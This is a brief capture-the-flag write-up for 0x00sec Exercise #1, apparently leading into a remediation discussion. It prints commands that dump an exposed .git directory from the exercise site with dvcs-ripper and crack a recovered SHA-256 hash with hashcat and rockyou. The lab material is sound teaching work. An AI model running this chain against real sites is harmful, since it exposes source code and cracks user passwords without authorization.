0x00sec CTF Exercise #1 Remediation

The Attack

Anyway, let’s get straight to it. You can find the exercise here. As noted, there are multiple ways to solve this. The first exercise is about web security. It looks like this.

0x00sec Exercise #1
A hint!
git clone https://github.com/kost/dvcs-ripper.git
cd dvcs-ripper/
./rip-git.pl -v -u https://exercise-1.0x00sec.dev/.git
git clone https://github.com/hashcat/hashcat.git 
make && make install
gunzip rockyou.txt.gz
hashcat -a 0 -m 1400 ~/Desktop/hash.txt ~/Downloads/Hob0Rules-master/wordlists/rockyou.txt -r ~/Downloads/Hob0Rules-master/hob064.rule -o ~/Desktop/cracked.txt


Now that you see how the login is obtained, we want to make sure this doesn’t happen to our client. What can we do?



